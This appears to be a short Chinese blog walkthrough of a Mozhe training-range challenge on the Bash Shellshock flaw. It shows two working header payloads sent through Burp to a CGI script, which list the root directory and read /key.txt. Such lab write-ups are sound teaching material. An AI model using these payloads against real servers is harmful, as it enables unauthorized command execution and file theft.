墨者Bash漏洞分析溯源
墨者Bash漏洞分析溯源
打开题目环境
Bash漏洞存在的路径多数在网页/cgi-bin/
下,打开此网页。
1 | http://url/cgi-bin/poc.cgi |
此漏洞是存在的,使用bp抓包
把在下面的Connection的参数,改成我们的执行代码。
1 | Connection: () { :;}; echo; /bin/ls / |
继续执行我们的命令 看key.txt
1 | Connection: () { :;}; echo; /bin/cat /key.txt |
问题解决
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Luo 666!